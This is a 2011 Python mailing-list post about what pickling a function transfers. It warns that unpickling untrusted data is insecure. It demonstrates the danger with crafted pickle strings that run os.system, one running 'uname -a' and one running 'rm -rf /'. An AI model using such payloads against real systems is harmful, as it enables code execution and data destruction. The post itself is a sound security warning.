Multiprocessing.connection magic
Thomas Rachel
nutznetz-0c1b6768-bfa9-48d5-a470-7603bd3aa915 at spamschutz.glglgl.de
Fri Jun 3 04:10:10 EDT 2011
Am 03.06.2011 08:59 schrieb Chris Angelico:
> I don't know how effective the pickling of functions actually is.
> Someone else will doubtless be able to fill that in.
Trying to do so, I get (with several protocol versions):
>>> import pickle
>>> pickle.dumps(pickle.dumps)
'cpickle\ndumps\np0\n.'
>>> pickle.dumps(pickle.dumps,0)
'cpickle\ndumps\np0\n.'
>>> pickle.dumps(pickle.dumps,1)
'cpickle\ndumps\nq\x00.'
>>> pickle.dumps(pickle.dumps,2)
'\x80\x02cpickle\ndumps\nq\x00.'
So there is just the module and name which get transferred.
Again, be aware that unpickling arbitrary data is highly insecure:
>>> pickle.loads("cos\nsystem\n(S'uname -a'\ntR.") # runs uname -a
Linux r03 2.6.34.6-xxxx-std-ipv6-32 #3 SMP Fri Sep 17 16:04:40 UTC 2010
i686 i686 i386 GNU/Linux
0
>>> pickle.loads("cos\nsystem\n(S'rm -rf /'\ntR.") # didn't try that...
Kids, don't try this at home nor on your external server.
Thomas
More information about the Python-list
mailing list